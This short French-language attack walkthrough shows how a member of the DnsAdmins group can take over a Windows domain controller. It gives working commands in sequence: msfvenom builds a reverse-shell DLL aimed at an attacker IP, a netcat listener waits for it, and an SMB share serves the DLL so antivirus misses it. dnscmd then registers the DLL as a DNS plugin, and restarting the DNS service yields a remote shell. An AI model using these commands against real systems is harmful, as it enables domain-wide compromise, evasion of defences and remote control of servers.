Si un utilisateur fait partie du groupe dnsadmins sur un DC, nous pouvons obtenir le compte administrateur de cette façon:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.11 LPORT=8888 -f dll > germain.dll
nc -nlvp 8888
Vous pourriez tester la dll en la copiant sur le serveur Windows et en exécutant pour avoir un shell :
rundll32.exe .\germain.dll,DnsPluginInitialize
#DnsPluginInitialize est la fonction dans la dll qui exécute le shell
Pour éviter la détection par l’antivirus, nous servons le fichier dans un partage sur l’ordinateur de l’attaquant
smbserver.py -smb2support germain /root/Desktop/germain #germain est le nom du partage
Sur le controlleur de domaines
dnscmd /config /serverlevelplugindll \10.10.10.11\germain\germain.dll
sc.exe stop dns
sc.exe start dns
et nous avons un shell sur l’ordinateur de l’attaquant!